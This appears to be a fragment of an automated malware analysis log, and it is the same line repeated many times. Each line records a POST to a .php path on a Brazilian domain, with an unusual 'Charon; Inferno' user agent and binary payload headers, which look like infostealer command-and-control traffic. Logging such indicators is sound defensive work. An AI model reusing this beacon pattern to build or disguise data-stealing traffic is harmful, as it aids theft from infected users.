          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
